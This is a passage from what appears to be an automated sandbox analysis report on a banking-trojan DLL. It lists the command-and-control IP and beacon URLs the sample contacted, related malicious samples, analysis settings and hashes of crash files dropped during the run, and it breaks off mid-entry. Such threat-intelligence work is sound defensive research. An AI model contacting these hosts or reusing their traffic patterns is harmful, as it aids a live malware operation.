  http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src    0%    Avira URL Cloud    safe
  http://constitution.org/usdeclar.txtC:    0%    URL Reputation    safe
  http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src    0%    Avira URL Cloud    safe
  http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0    0%    Avira URL Cloud    safe
  http://177./h    0%    Avira URL Cloud    safe
                      No contacted domains info
Contacted URLs (Name / Malicious / Antivirus Detection / Reputation)
  http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src
    Malicious: true; Avira URL Cloud: safe; Reputation: unknown
  http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src
    Malicious: true; Avira URL Cloud: safe; Reputation: unknown
URLs from Memory and Binaries (Name / Source / Malicious / Antivirus Detection / Reputation)
  http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/
    Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Avira URL Cloud: safe; Reputation: unknown
  http://https://file://USER.ID%lu.exe/upd
    Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp; control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp; control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Avira URL Cloud: safe; Reputation: low
  http://146.70.35.138/phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZ
    Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Avira URL Cloud: safe; Reputation: unknown
  http://constitution.org/usdeclar.txt
    Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp; control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp; control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; URL Reputation: safe; Reputation: unknown
  http://146.70.35.138/phpadmin/4B
    Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Avira URL Cloud: safe; Reputation: unknown
  http://constitution.org/usdeclar.txtC:
    Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp; control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp; control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; URL Reputation: safe; Reputation: unknown
  http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0
    Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Avira URL Cloud: safe; Reputation: unknown
  http://177./h
    Source: rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Avira URL Cloud: safe; Reputation: unknown
Contacted IPs (IP / Domain / Country / ASN / ASN Name / Malicious)
  146.70.35.138    Domain: unknown    Country: United Kingdom    ASN: 2018 (TENET-1ZA)    Malicious: true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:614013
Start date and time: 22/04/2022 18:10:41 (2022-04-22 18:10:41 +02:00)
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:nhLAwAo49f (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@31/29@0/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HDC Information:
                      • Successful, ratio: 21.3% (good quality ratio 20.1%)
                      • Quality average: 80.7%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 113
                      • Number of non-executed functions: 209
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173, 13.107.42.16
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 5520 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: nhLAwAo49f.dll
Time / Type / Description
  18:12:12    API Interceptor    2x Sleep call for process: WerFault.exe modified
  18:13:23    API Interceptor    34x Sleep call for process: powershell.exe modified
Associated samples by IP (Match / Associated Sample Name / Detection)
  146.70.35.138:
    d6YCUW421p.dll (malicious)
    FJHd.dll (malicious)
    NdmYtW.dll (malicious)
    pDut.dll (malicious)
    HxEWwh74qT.dll (malicious)
    b.exe (malicious)
    0x0007000000012676-63.exe (malicious)
No context

Associated samples by ASN (Match / Associated Sample Name / Detection / IP)
  TENET-1ZA:
    d6YCUW421p.dll (malicious), 146.70.35.138
    FJHd.dll (malicious), 146.70.35.138
    NdmYtW.dll (malicious), 146.70.35.138
    pDut.dll (malicious), 146.70.35.138
    HxEWwh74qT.dll (malicious), 146.70.35.138
    o0nBmbV6au (malicious), 163.200.142.51
    84wwQQbbDj (malicious), 143.128.168.158
    o2AHUUgivh (malicious), 146.239.92.86
    b.exe (malicious), 146.70.35.138
    bKhQyaq7WP.exe (malicious), 146.70.87.230
    wZtQzFZJYa.exe (malicious), 146.70.87.230
    H7qgr6X0nv (malicious), 155.233.139.115
    eoT6xLnNfY.exe (malicious), 146.70.87.230
    jew.x86 (malicious), 146.69.137.13
    sora.arm (malicious), 155.232.149.247
    irq0 (malicious), 146.68.19.240
    l0zzxRl556.exe (malicious), 146.70.87.230
    wuxznEjJoI (malicious), 143.128.168.138
    BKpr0Ubn9l (malicious), 196.249.7.64
    pandora.arm7-20220417-1500 (malicious), 152.106.89.16
No context
No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.841963229435912
                                    Encrypted:false
                                    SSDEEP:96:xfHQ9nYysy9haSK7FISZpXIQcQac6pcEccw35+a+z+HbHgbAS/YyNlISWbSm9mBJ:xmniH0tGtjuq/u7sfS274Itb
                                    MD5:B9F67E01D203683E89B26D078734FCFF
                                    SHA1:38E8B043716123B26DCC00B71D43F38010EE7327
                                    SHA-256:3E241943DC4B98B263609B2F76F314FF9C4E0FA33AD75873B74987A28931C407
                                    SHA-512:0F4C257BC53AA4FD58357E622660E4E9116D74554747CAEA6F3B3BE3B1388241F4C5F6FBDCD8035E4AEBE8286E370B4B4C880B8089BA7972D6C281F57973D7AA
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.9.9.2.4.2.2.9.3.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.2.b.3.5.0.c.-.a.5.2.b.-.4.5.9.c.-.9.f.e.9.-.6.1.6.0.3.f.0.8.4.4.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.a.3.c.c.9.4.-.2.2.3.4.-.4.2.2.d.-.b.d.5.1.-.d.0.3.a.2.5.1.1.7.f.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.7.-.7.6.a.6.-.7.b.2.1.a.f.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8456985887519763
                                    Encrypted:false
                                    SSDEEP:96:8lX5F8cT9nYy7y9haSKzfFEpXIQcQAc60cExcw32u+a+z+HbHgbAS/YyNlISWbSB:8V562naH+wL7juq/u7sES274ItW
                                    MD5:613F641A93068DBAB700946451ECE534
                                    SHA1:9402807A974B4330A7989856A3821FAF99FA8E19
                                    SHA-256:39F32A0664DFDDC05FC3EB61E99D44D6622F45778A6EBFAF2EBC9F0F8EDE9763
                                    SHA-512:E13D5BBE6195562BD08B6D70CCDDCC572100A898A02365FF35687C74142C5D840CF3B800FC62A872E4C8AC7043E1219BCF821E473CF46DE77A066784E50F1837
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.9.9.4.0.9.2.5.7.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.9.9.4.3.1.2.8.9.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.c.d.d.6.f.0.-.2.7.8.d.-.4.f.5.f.-.a.b.f.5.-.4.5.d.f.3.c.b.4.8.7.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.d.7.1.8.f.2.-.6.e.5.d.-.4.5.b.0.-.8.b.b.0.-.b.b.4.e.8.6.c.f.0.8.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.7.-.7.6.a.6.-.7.b.2.1.a.f.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8482062576733173
                                    Encrypted:false
                                    SSDEEP:96:8DXQQFr9nYyCy9haot7Jn7YpXIQcQac6pcEccw35+a+z+HbHgbAS/YyNlISWbSmp:8zHTnwH0tGtjuq/u7sfS274ItW
                                    MD5:C1804D727586FA03C9929BEA75F44214
                                    SHA1:298A2AD8FC2D5F5E4E9D8ABE8B703704F50FA54D
                                    SHA-256:472C519A2F993185C462EDF506FFBD5E1C139AF94D473D21398BD6B4759EEECC
                                    SHA-512:8D1242B78A2812F9A65428E487627D748054AEEA58F5546332901995E710F3D1A7BC1EF36F5642CB10F2B25816452123DB9B9593AAC0B35BE8A60A37C6DCF56E
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.9.9.2.8.9.1.4.3.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.9.9.3.1.0.0.8.1.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.0.6.a.a.2.-.9.a.b.d.-.4.1.2.4.-.9.b.9.4.-.5.f.b.c.3.e.4.9.a.d.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.3.a.8.e.e.c.-.7.9.8.6.-.4.3.d.f.-.8.5.d.1.-.3.d.5.c.d.b.b.e.9.c.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.7.-.7.6.a.6.-.7.b.2.1.a.f.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 01:12:09 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):41922
                                    Entropy (8bit):1.9480086397048668
                                    Encrypted:false
                                    SSDEEP:192:+5mBoTh5NijDLY+JWti4OrKBT6I7hb/3hQh70C/Vj92jI1GFIt:emsXuLWtSra2Iy0C/6Kt
                                    MD5:6A2C469E5D8EE98CEA5459F21EC0D3F8
                                    SHA1:8CD453195450BB0A30A22B18001A6EB7B62C4921
                                    SHA-256:4ECE87A3FBE22E8238A5C4A8EC0948384B4169D37063370CDE94C1FE207A42E8
                                    SHA-512:7E16065D3B4A63948B8F1C1A665E7D7F8A110E2B59F418162E8731ADE683A19CC88EF8708CB0969D8A7484A85CDEF0E79E688E6D389D33016F95B35F0B3C5E6D
                                    Malicious:false
                                    Preview:MDMP....... .......iRcb........................4...........$................)..........`.......8...........T........... ................................................................................................U...........B..............GenuineIntelW...........T.......T...^Rcb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8336
                                    Entropy (8bit):3.697730021064886
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNiv/6bu6YoOSUhRggmftSsmdCprn89b45XsfRK5m:RrlsNiX6i6YBSUhRggmftSsmdGcf1
                                    MD5:BAB16FAD64EE9DE354E6B613A2242979
                                    SHA1:6DE0C93EDF2AB5560FEFFE9FE1F9D92D866CA392
                                    SHA-256:DD34B73EBA69F8B911431F65158281A0B1717DD54347A3F778BDB69D5DB95C73
                                    SHA-512:E9FB3069FB6C23047E7373D7B9F4EBFEA200EE3E593B7582598606D19D61B79503810AF355F174CAA7B7AE4167A83108ABA1C97B5B4DA9903CED321CF238F18A
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.d.>.......
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4598
                                    Entropy (8bit):4.473891299554449
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zs/iJgtWI9giUyWgc8sqYjhD78fm8M4J2+uZFU+q849LwKcQIcQw02d:uITfIaUTgrsqY1D4J0YtwKkw02d
                                    MD5:5521F1C6007010E32F65281637389EF1
                                    SHA1:3AF2C8760B50045A62C09CF6D65E84C93777C84F
                                    SHA-256:E0B6D98ABA05B3403B3A298134F27F23E2C8ABB29C84791A29529AD951A3C20A
                                    SHA-512:CD97F689042211C58C3FB656100B98D49636AA81C101548967D31F986B8AA0FD7DDE35E17391877C6EB68D00911CCB3E977DC3A6995D6585FD082595FB5528D5
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483822" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 01:12:21 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):54966
                                    Entropy (8bit):2.1904283410365792
                                    Encrypted:false
                                    SSDEEP:192:K5/sh5NijDiD3n6OrKBzruwBVxFIv393F9/KLYmCuwGCoVwsL1bUOI7cSh/bk7jA:aEXuiTFrauwfU93u7VL1bpI5aj4zR
                                    MD5:D29BCF861DE82B8EF2C4B4CB236F4A14
                                    SHA1:CF3CB6B882FD00135558486890E2B4DCB676F503
                                    SHA-256:41AAF6549F2CA0993B996D9535E38E78DBD198924DF704212700DC4430AAE38B
                                    SHA-512:3D04A4615689CB00DD12DC116532D430253CE57E5CC00606984185C2B41C6556650D033260947435A7B4FCE63429891D81F2E9D838065E939F9D6ABE0CF1DE8F
                                    Malicious:false
                                    Preview:MDMP....... .......uRcb........................4...........$...........$....)..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T.......T...^Rcb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 01:12:05 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):42122
                                    Entropy (8bit):1.9777565374307426
                                    Encrypted:false
                                    SSDEEP:192:6542pth5NijDW2gOrKBKyI7hb/3h/bZ7Jg+yT5luen5:qHXuWsrazIDdJg+qn
                                    MD5:D8C861E1784A220342495A141161646D
                                    SHA1:D41096C4809F4AFC6C982C6AD9B028C7E63D871D
                                    SHA-256:8E50BC2DDE9F7A843352923361DFDE1204862BCDF523883B8AE9EFB664A8074A
                                    SHA-512:BD7FE851328BE59B0BEEE6650888081D79394EC0A032D5A9CE4774BD096799D5D26EFC516A20130A7C5684E437976C135E8D5B6390504F441D0AE2963256CC27
                                    Malicious:false
                                    Preview:MDMP....... .......eRcb........................4...........$................)..........`.......8...........T........... ...j............................................................................................U...........B..............GenuineIntelW...........T.......T...^Rcb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8294
                                    Entropy (8bit):3.696880610282114
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNivU6Tu6YoHSUOkgmf8SgmdCpD989bHXsfVRtm:RrlsNiM6a6YoSUOkgmf8SgmPHcfVS
                                    MD5:4E8276566E0F5F4EE2DE9AF2FC1F9583
                                    SHA1:9EFE009956124EDD248AC50DA59609C809CA343F
                                    SHA-256:175493C9030215AB5B987D34933B81EEA550C6C55A5943E0A938C6BFA7ED4927
                                    SHA-512:611D905E4E80FE660EA4BC3402B7F059B69B25B02A41E704D7A56972DF96323FEF3AB3749AC3A12F509883F518AA26239AD05FF30B88729105C205BD5AC49C17
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.d.>.......
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4564
                                    Entropy (8bit):4.442194983388651
